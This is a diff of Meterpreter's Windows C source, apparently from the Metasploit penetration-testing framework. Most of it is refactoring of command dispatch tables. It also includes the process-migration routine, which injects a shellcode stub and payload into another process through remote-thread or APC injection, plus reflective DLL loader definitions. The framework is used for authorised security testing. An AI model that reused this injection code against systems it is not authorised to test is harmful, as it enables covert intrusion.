extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//

223
c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h
View File

@ -1,223 +0,0 @@
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
// Enable this define to turn on OutputDebugString support
//#define ENABLE_OUTPUTDEBUGSTRING 1
// Enable this define to turn on locking of memory to prevent paging
#define ENABLE_STOPPAGING 1
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define NTDLLDLL_HASH 0x3CFA685D
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
#ifdef ENABLE_STOPPAGING
typedef LPVOID (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T );
#define VIRTUALLOCK_HASH 0x0EF632F2
#endif
#ifdef ENABLE_OUTPUTDEBUGSTRING
typedef LPVOID (WINAPI * OUTPUTDEBUG)( LPCSTR );
#define OUTPUTDEBUG_HASH 0x470D22BC
#endif
#define IMAGE_REL_BASED_ARM_MOV32A 5
#define IMAGE_REL_BASED_ARM_MOV32T 7
#define ARM_MOV_MASK (DWORD)(0xFBF08000)
#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00)
#define ARM_MOVW 0xF2400000
#define ARM_MOVT 0xF2C00000
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD _hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

33
c/meterpreter/source/client/remote_dispatch.c
View File

@ -45,22 +45,11 @@ DWORD ex_remote_request_core_channel_close(Remote *remote, Packet *packet)
****************************/
// Dispatch table
Command custom_commands[] =
Command customCommands[] =
{
{ "core_channel_open",
{ EMPTY_DISPATCH_HANDLER },
{ ex_remote_response_core_channel_open, { 0 }, 0 },
},
{ "core_channel_close",
{ ex_remote_request_core_channel_close, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Terminator
{ NULL,
{ EMPTY_DISPATCH_HANDLER },
{ EMPTY_DISPATCH_HANDLER },
},
COMMAND_REP("core_channel_open", ex_remote_response_core_channel_open),
COMMAND_REP("core_channel_close", ex_remote_response_core_channel_cloase),
COMMAND_TERMINATOR
};
@ -69,12 +58,7 @@ Command custom_commands[] =
*/
VOID remote_register_core_dispatch_routines()
{
DWORD index;
for (index = 0;
custom_commands[index].method;
index++)
command_register(&custom_commands[index]);
command_register_all(customCommands);
}
/*
@ -82,10 +66,5 @@ VOID remote_register_core_dispatch_routines()
*/
VOID remote_deregister_core_dispatch_routines()
{
DWORD index;
for (index = 0;
custom_commands[index].method;
index++)
command_deregister(&custom_commands[index]);
command_deregister_all(customCommands);
}

216
c/meterpreter/source/common/arch/win/i386/base_dispatch.c
View File

@ -1,9 +1,6 @@
#include "common.h"
#include "base_inject.h"
// An external reference to the meterpreters main server thread, so we can shutdown gracefully after successfull migration.
extern THREAD * serverThread;
// see '/msf3/external/source/shellcode/x86/migrate/migrate.asm'
BYTE migrate_stub_x86[] = "\xFC\x8B\x74\x24\x04\x81\xEC\x00\x20\x00\x00\xE8\x89\x00\x00\x00"
"\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B"
@ -62,155 +59,182 @@ typedef struct _MIGRATECONTEXT
} MIGRATECONTEXT, * LPMIGRATECONTEXT;
/*
* Migrate the meterpreter server from the current process into another process.
/*!
* @brief Migrate the meterpreter server from the current process into another process.
* @param remote Pointer to the \c Remote instance.
* @param packet Pointer to the request packet.
* @param pResult Pointer to the memory that will receive the result.
* @returns Indication of whether the server should continue processing or not.
*/
BOOL remote_request_core_migrate( Remote * remote, Packet * packet, DWORD* pResult )
BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResult)
{
DWORD dwResult = ERROR_SUCCESS;
Packet * response = NULL;
HANDLE hToken = NULL;
HANDLE hProcess = NULL;
HANDLE hEvent = NULL;
BYTE * lpPayloadBuffer = NULL;
LPVOID lpMigrateStub = NULL;
LPVOID lpMemory = NULL;
MIGRATECONTEXT ctx = {0};
DWORD dwResult = ERROR_SUCCESS;
Packet * response = NULL;
HANDLE hToken = NULL;
HANDLE hProcess = NULL;
HANDLE hEvent = NULL;
BYTE * lpPayloadBuffer = NULL;
LPVOID lpMigrateStub = NULL;
LPVOID lpMemory = NULL;
MIGRATECONTEXT ctx = { 0 };
DWORD dwMigrateStubLength = 0;
DWORD dwPayloadLength = 0;
DWORD dwProcessID = 0;
DWORD dwDestinationArch = 0;
DWORD dwPayloadLength = 0;
DWORD dwProcessID = 0;
DWORD dwDestinationArch = 0;
do
{
response = packet_create_response( packet );
if( !response )
response = packet_create_response(packet);
if (!response)
{
break;
}
// Get the process identifier to inject into
dwProcessID = packet_get_tlv_value_uint( packet, TLV_TYPE_MIGRATE_PID );
dwProcessID = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_PID);
// Get the target process architecture to inject into
dwDestinationArch = packet_get_tlv_value_uint( packet, TLV_TYPE_MIGRATE_ARCH );
dwDestinationArch = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_ARCH);
// Get the length of the payload buffer
dwPayloadLength = packet_get_tlv_value_uint( packet, TLV_TYPE_MIGRATE_LEN );
dwPayloadLength = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_LEN);
// Receive the actual migration payload buffer
lpPayloadBuffer = packet_get_tlv_value_string( packet, TLV_TYPE_MIGRATE_PAYLOAD );
dprintf("[MIGRATE] Attempting to migrate. ProcessID=%d, Arch=%s, PayloadLength=%d", dwProcessID, ( dwDestinationArch == 2 ? "x64" : "x86" ), dwPayloadLength );
// If we can, get SeDebugPrivilege...
if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
{
TOKEN_PRIVILEGES priv = {0};
lpPayloadBuffer = packet_get_tlv_value_string(packet, TLV_TYPE_MIGRATE_PAYLOAD);
priv.PrivilegeCount = 1;
dprintf("[MIGRATE] Attempting to migrate. ProcessID=%d, Arch=%s, PayloadLength=%d", dwProcessID, (dwDestinationArch == 2 ? "x64" : "x86"), dwPayloadLength);
// If we can, get SeDebugPrivilege...
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
TOKEN_PRIVILEGES priv = { 0 };
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
{
if( AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL ) );
dprintf("[MIGRATE] Got SeDebugPrivilege!" );
if (AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL));
{
dprintf("[MIGRATE] Got SeDebugPrivilege!");
}
}
CloseHandle( hToken );
CloseHandle(hToken);
}
// Open the process so that we can migrate into it
hProcess = OpenProcess( PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcessID );
if( !hProcess )
BREAK_ON_ERROR( "[MIGRATE] OpenProcess failed" )
hProcess = OpenProcess(PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcessID);
if (!hProcess)
{
BREAK_ON_ERROR("[MIGRATE] OpenProcess failed")
}
if ( remote->transport == METERPRETER_TRANSPORT_SSL ) {
if (remote->transport == METERPRETER_TRANSPORT_SSL) {
// Duplicate the socket for the target process if we are SSL based
if( WSADuplicateSocket( remote_get_fd( remote ), dwProcessID, &ctx.info ) != NO_ERROR )
BREAK_ON_WSAERROR( "[MIGRATE] WSADuplicateSocket failed" )
if (WSADuplicateSocket(remote_get_fd(remote), dwProcessID, &ctx.info) != NO_ERROR)
{
BREAK_ON_WSAERROR("[MIGRATE] WSADuplicateSocket failed")
}
}
// Create a notification event that we'll use to know when it's safe to exit
// (once the socket has been referenced in the other process)
hEvent = CreateEvent( NULL, TRUE, FALSE, NULL );
if( !hEvent )
BREAK_ON_ERROR( "[MIGRATE] CreateEvent failed" )
hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
if (!hEvent)
{
BREAK_ON_ERROR("[MIGRATE] CreateEvent failed")
}
// Duplicate the event handle for the target process
if( !DuplicateHandle( GetCurrentProcess(), hEvent, hProcess, &ctx.e.hEvent, 0, TRUE, DUPLICATE_SAME_ACCESS ) )
BREAK_ON_ERROR( "[MIGRATE] DuplicateHandle failed" )
if (!DuplicateHandle(GetCurrentProcess(), hEvent, hProcess, &ctx.e.hEvent, 0, TRUE, DUPLICATE_SAME_ACCESS))
{
BREAK_ON_ERROR("[MIGRATE] DuplicateHandle failed")
}
// Get the architecture specific process migration stub...
if( dwDestinationArch == PROCESS_ARCH_X86 )
if (dwDestinationArch == PROCESS_ARCH_X86)
{
lpMigrateStub = (LPVOID)&migrate_stub_x86;
lpMigrateStub = (LPVOID)&migrate_stub_x86;
dwMigrateStubLength = sizeof(migrate_stub_x86);
}
else if( dwDestinationArch == PROCESS_ARCH_X64 )
else if (dwDestinationArch == PROCESS_ARCH_X64)
{
lpMigrateStub = (LPVOID)&migrate_stub_x64;
lpMigrateStub = (LPVOID)&migrate_stub_x64;
dwMigrateStubLength = sizeof(migrate_stub_x64);
}
else
{
SetLastError( ERROR_BAD_ENVIRONMENT );
BREAK_ON_ERROR( "[MIGRATE] Invalid target architecture" )
SetLastError(ERROR_BAD_ENVIRONMENT);
BREAK_ON_ERROR("[MIGRATE] Invalid target architecture")
}
// Allocate memory for the migrate stub, context and payload
lpMemory = VirtualAllocEx( hProcess, NULL, dwMigrateStubLength + sizeof(MIGRATECONTEXT) + dwPayloadLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if( !lpMemory )
BREAK_ON_ERROR( "[MIGRATE] VirtualAllocEx failed" )
// Calculate the address of the payload...
ctx.p.lpPayload = ( (BYTE *)lpMemory + dwMigrateStubLength + sizeof(MIGRATECONTEXT) );
// Write the migrate stub to memory...
if( !WriteProcessMemory( hProcess, lpMemory, lpMigrateStub, dwMigrateStubLength, NULL ) )
BREAK_ON_ERROR( "[MIGRATE] WriteProcessMemory 1 failed" )
// Write the migrate context to memory...
if( !WriteProcessMemory( hProcess, ( (BYTE *)lpMemory + dwMigrateStubLength ), &ctx, sizeof(MIGRATECONTEXT), NULL ) )
BREAK_ON_ERROR( "[MIGRATE] WriteProcessMemory 2 failed" )
// Write the migrate payload to memory...
if( !WriteProcessMemory( hProcess, ctx.p.lpPayload, lpPayloadBuffer, dwPayloadLength, NULL ) )
BREAK_ON_ERROR( "[MIGRATE] WriteProcessMemory 3 failed" )
// First we try to migrate by directly creating a remote thread in the target process
if( inject_via_remotethread( remote, response, hProcess, dwDestinationArch, lpMemory, ((BYTE*)lpMemory+dwMigrateStubLength) ) != ERROR_SUCCESS )
lpMemory = VirtualAllocEx(hProcess, NULL, dwMigrateStubLength + sizeof(MIGRATECONTEXT)+dwPayloadLength, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!lpMemory)
{
dprintf( "[MIGRATE] inject_via_remotethread failed, trying inject_via_apcthread..." );
// If that fails we can try to migrate via a queued APC in the target process
if( inject_via_apcthread( remote, response, hProcess, dwProcessID, dwDestinationArch, lpMemory, ((BYTE*)lpMemory+dwMigrateStubLength) ) != ERROR_SUCCESS )
BREAK_ON_ERROR( "[MIGRATE] inject_via_apcthread failed" )
BREAK_ON_ERROR("[MIGRATE] VirtualAllocEx failed")
}
// Calculate the address of the payload...
ctx.p.lpPayload = ((BYTE *)lpMemory + dwMigrateStubLength + sizeof(MIGRATECONTEXT));
//// Wait at most 15 seconds for the event to be set letting us know that it's finished
//// Unfortunately, its too late to do anything about a failure at this point
//if( WaitForSingleObjectEx( hEvent, 15000, FALSE ) != WAIT_OBJECT_0 )
// dprintf("[MIGRATE] WaitForSingleObjectEx failed with no way to recover");
// Write the migrate stub to memory...
if (!WriteProcessMemory(hProcess, lpMemory, lpMigrateStub, dwMigrateStubLength, NULL))
{
BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 1 failed")
}
// Write the migrate context to memory...
if (!WriteProcessMemory(hProcess, ((BYTE *)lpMemory + dwMigrateStubLength), &ctx, sizeof(MIGRATECONTEXT), NULL))
{
BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 2 failed")
}
// Write the migrate payload to memory...
if (!WriteProcessMemory(hProcess, ctx.p.lpPayload, lpPayloadBuffer, dwPayloadLength, NULL))
{
BREAK_ON_ERROR("[MIGRATE] WriteProcessMemory 3 failed")
}
// First we try to migrate by directly creating a remote thread in the target process
if (inject_via_remotethread(remote, response, hProcess, dwDestinationArch, lpMemory, ((BYTE*)lpMemory + dwMigrateStubLength)) != ERROR_SUCCESS)
{
dprintf("[MIGRATE] inject_via_remotethread failed, trying inject_via_apcthread...");
// If that fails we can try to migrate via a queued APC in the target process
if (inject_via_apcthread(remote, response, hProcess, dwProcessID, dwDestinationArch, lpMemory, ((BYTE*)lpMemory + dwMigrateStubLength)) != ERROR_SUCCESS)
{
BREAK_ON_ERROR("[MIGRATE] inject_via_apcthread failed")
}
}
dwResult = ERROR_SUCCESS;
} while( 0 );
} while (0);
// If we failed and have not sent the response, do so now
if( dwResult != ERROR_SUCCESS && response )
packet_transmit_response( dwResult, remote, response );
if (dwResult != ERROR_SUCCESS && response)
{
packet_transmit_response(dwResult, remote, response);
}
// Cleanup...
if( hProcess )
CloseHandle( hProcess );
if (hProcess)
{
CloseHandle(hProcess);
}
if( hEvent )
CloseHandle( hEvent );
if (hEvent)
{
CloseHandle(hEvent);
}
if( pResult )
if (pResult)
{
*pResult = dwResult;
}
return dwResult = ERROR_SUCCESS ? TRUE : FALSE;
// if migration succeeded, return 'FALSE' to indicate server thread termination.
return ERROR_SUCCESS == dwResult ? FALSE : TRUE;
}

2
c/meterpreter/source/common/arch/win/i386/base_inject.c
View File

@ -1,6 +1,6 @@
#include "common.h"
#include "base_inject.h"
#include "./../../../../ReflectiveDLLInjection/LoadLibraryR.h"
#include "./../../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include <Tlhelp32.h>
// Simple trick to get the current meterpreters arch

417
c/meterpreter/source/common/base.c
View File

@ -47,7 +47,7 @@ DWORD THREADCALL command_process_thread( THREAD * thread );
/*!
* @brief Base RPC dispatch table.
*/
Command base_commands[] =
Command baseCommands[] =
{
// Console commands
{ "core_console_write",
@ -83,7 +83,7 @@ Command base_commands[] =
* @brief Dynamically registered command extensions.
* @details A linked list of commands registered on the fly by reflectively-loaded extensions.
*/
Command *extension_commands = NULL;
Command *extensionCommands = NULL;
/*!
* @brief Register a full list of commands with meterpreter.
@ -94,7 +94,9 @@ void command_register_all(Command commands[])
DWORD index;
for (index = 0; commands[index].method; index++)
command_register( &commands[index] );
{
command_register(&commands[index]);
}
}
/*!
@ -114,13 +116,15 @@ DWORD command_register(Command *command)
memcpy(newCommand, command, sizeof(Command));
dprintf("Setting new command...");
if (extension_commands)
extension_commands->prev = newCommand;
if (extensionCommands)
{
extensionCommands->prev = newCommand;
}
dprintf("Fixing next/prev...");
newCommand->next = extension_commands;
newCommand->prev = NULL;
extension_commands = newCommand;
dprintf("Fixing next/prev... %p", newCommand);
newCommand->next = extensionCommands;
newCommand->prev = NULL;
extensionCommands = newCommand;
dprintf("Done...");
return ERROR_SUCCESS;
@ -135,7 +139,9 @@ void command_deregister_all(Command commands[])
DWORD index;
for (index = 0; commands[index].method; index++)
{
command_deregister(&commands[index]);
}
}
/*!
@ -149,7 +155,7 @@ DWORD command_deregister(Command *command)
DWORD res = ERROR_NOT_FOUND;
// Search the extension list for the command
for (current = extension_commands, prev = NULL;
for (current = extensionCommands, prev = NULL;
current;
prev = current, current = current->next)
{
@ -157,12 +163,18 @@ DWORD command_deregister(Command *command)
continue;
if (prev)
{
prev->next = current->next;
}
else
extension_commands = current->next;
{
extensionCommands = current->next;
}
if (current->next)
{
current->next->prev = prev;
}
// Deallocate it
free(current);
@ -175,19 +187,21 @@ DWORD command_deregister(Command *command)
return res;
}
/*! * @brief A list of all command threads currenlty executing. */
/*! @brief A list of all command threads currenlty executing. */
LIST * commandThreadList = NULL;
/*!
* @brief Block untill all running command threads have finished.
*/
VOID command_join_threads( VOID )
VOID command_join_threads(VOID)
{
while( list_count( commandThreadList ) > 0 )
while (list_count(commandThreadList) > 0)
{
THREAD * thread = (THREAD *)list_get( commandThreadList, 0 );
if( thread )
thread_join( thread );
THREAD * thread = (THREAD *)list_get(commandThreadList, 0);
if (thread)
{
thread_join(thread);
}
}
}
@ -199,7 +213,8 @@ VOID command_join_threads( VOID )
*/
VOID reap_zombie_thread(void * param)
{
while(1) {
while(1)
{
waitpid(-1, NULL, __WCLONE);
// on 2.6 kernels, don't chew 100% CPU
usleep(500000);
@ -209,7 +224,8 @@ VOID reap_zombie_thread(void * param)
/*!
* @brief Process a command directly on the current thread.
* @param command Pointer to the \c Command to be executed.
* @param baseCommand Pointer to the \c Command in the base command list to be executed.
* @param extensionCommand Pointer to the \c Command in the extension command list to be executed.
* @param remote Pointer to the \c Remote endpoint for this command.
* @param packet Pointer to the \c Packet containing the command detail.
* @returns Boolean value indicating if the server should continue processing.
@ -217,82 +233,162 @@ VOID reap_zombie_thread(void * param)
* @retval FALSE The server should stop processing and shut down.
* @sa command_handle
* @sa command_process_thread
* @remarks The \c baseCommand is always executed first, but if there is an \c extensionCommand
* then the result of the \c baseCommand processing is ignored and the result of
* \c extensionCommand is returned instead.
*/
BOOL command_process_inline( Command *command, Remote *remote, Packet *packet )
BOOL command_process_inline(Command *baseCommand, Command *extensionCommand, Remote *remote, Packet *packet)
{
DWORD result;
BOOL serverContinue = TRUE;
Tlv requestIdTlv;
PCHAR requestId;
PacketTlvType packetTlvType;
dprintf( "[COMMAND] Executing command %s", command->method );
Command *commands[2] = { baseCommand, extensionCommand };
Command *command = NULL;
DWORD dwIndex;
LPCSTR lpMethod = NULL;
__try
{
do
{
#ifdef _WIN32
// Impersonate the thread token if needed (only on Windows)
if(remote->hServerToken != remote->hThreadToken) {
if(! ImpersonateLoggedOnUser(remote->hThreadToken)) {
dprintf( "[COMMAND] Failed to impersonate thread token (%s) (%u)", command->method, GetLastError());
for (dwIndex = 0; dwIndex < 2; ++dwIndex)
{
command = commands[dwIndex];
if (command == NULL)
{
continue;
}
lpMethod = command->method;
dprintf("[COMMAND] Executing command %s", lpMethod);
#ifdef _WIN32
// Impersonate the thread token if needed (only on Windows)
if (remote->hServerToken != remote->hThreadToken)
{
if (!ImpersonateLoggedOnUser(remote->hThreadToken))
{
dprintf("[COMMAND] Failed to impersonate thread token (%s) (%u)", lpMethod, GetLastError());
}
}
}
#endif
// Validate the arguments, if requested. Always make sure argument
// lengths are sane.
if( command_validate_arguments( command, packet ) != ERROR_SUCCESS )
break;
// Validate the arguments, if requested. Always make sure argument
// lengths are sane.
if (command_validate_arguments(command, packet) != ERROR_SUCCESS)
{
continue;
}
packetTlvType = packet_get_type( packet );
switch ( packetTlvType )
{
case PACKET_TLV_TYPE_REQUEST:
case PACKET_TLV_TYPE_PLAIN_REQUEST:
if (command->request.inline_handler) {
dprintf( "[DISPATCH] executing inline request handler %s", command->method );
serverContinue = command->request.inline_handler( remote, packet, &result );
} else {
dprintf( "[DISPATCH] executing request handler %s", command->method );
result = command->request.handler( remote, packet );
packetTlvType = packet_get_type(packet);
switch (packetTlvType)
{
case PACKET_TLV_TYPE_REQUEST:
case PACKET_TLV_TYPE_PLAIN_REQUEST:
if (command->request.inline_handler) {
dprintf("[DISPATCH] executing inline request handler %s", lpMethod);
serverContinue = command->request.inline_handler(remote, packet, &result) && serverContinue;
}
else
{
dprintf("[DISPATCH] executing request handler %s", lpMethod);
result = command->request.handler(remote, packet);
}
break;
case PACKET_TLV_TYPE_RESPONSE:
case PACKET_TLV_TYPE_PLAIN_RESPONSE:
if (command->response.inline_handler)
{
dprintf("[DISPATCH] executing inline response handler %s", lpMethod);
serverContinue = command->response.inline_handler(remote, packet, &result) && serverContinue;
}
else
{
dprintf("[DISPATCH] executing response handler %s", lpMethod);
result = command->response.handler(remote, packet);
}
break;
}
break;
case PACKET_TLV_TYPE_RESPONSE:
case PACKET_TLV_TYPE_PLAIN_RESPONSE:
if (command->response.inline_handler) {
dprintf( "[DISPATCH] executing inline response handler %s", command->method );
serverContinue = command->response.inline_handler( remote, packet, &result );
} else {
dprintf( "[DISPATCH] executing response handler %s", command->method );
result = command->response.handler( remote, packet );
}
break;
}
dprintf("[COMMAND] Calling completion handlers...");
// Get the request identifier if the packet has one.
if ( packet_get_tlv_string( packet, TLV_TYPE_REQUEST_ID, &requestIdTlv ) == ERROR_SUCCESS )
if (packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID, &requestIdTlv) == ERROR_SUCCESS)
{
requestId = (PCHAR)requestIdTlv.buffer;
}
// Finally, call completion routines for the provided identifier
if( ((packetTlvType == PACKET_TLV_TYPE_RESPONSE) || (packetTlvType == PACKET_TLV_TYPE_PLAIN_RESPONSE)) && requestId)
packet_call_completion_handlers( remote, packet, requestId );
if (((packetTlvType == PACKET_TLV_TYPE_RESPONSE) || (packetTlvType == PACKET_TLV_TYPE_PLAIN_RESPONSE)) && requestId)
{
packet_call_completion_handlers(remote, packet, requestId);
}
} while( 0 );
